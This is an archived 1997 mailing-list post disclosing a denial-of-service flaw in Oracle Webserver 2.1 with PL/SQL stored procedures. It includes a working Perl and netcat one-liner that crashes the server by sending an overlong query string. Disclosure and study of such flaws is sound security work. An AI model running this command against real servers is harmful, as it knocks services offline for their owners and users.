mailing list archives
DoS against Oracle Webserver 2.1 with PL/SQL stored procedures
From: jas () PDC KTH SE (Simon Josefsson)
Date: Wed, 23 Jul 1997 00:15:31 +0200
Fellow bugtraqers, I stumpled over this tonight. It's a DoS-attack
against a Oracle Webserver 2.1 that serves PL/SQL stored procedures.
The server dumps quietly, I haven't found anything in the logs. v2.0
does not seem to exhibit this behaviour (v2.1 is the latest, but many
sites seem to still run v2.0).
I'm sorry if this is old news (but I'd appreciate of someone told me
if there is a bugfix somewhere).
(PL/SQL is, simply put, a scripting language within the Oracle database)
# requires Perl and NetCat.
# prg <host> <port> <path>
# # ./prg your.own.domain.com 80 /ows-bin
# if you have the PL/SQL stored procedure in /ows-bin/.
perl -e 'print "GET $ARGV/fnord?foo=", "a" x 2600, " HTTP/1.0\n\n\n\n";' "$3"|nc $1 $2
- DoS against Oracle Webserver 2.1 with PL/SQL stored procedures Simon Josefsson (Jul 22)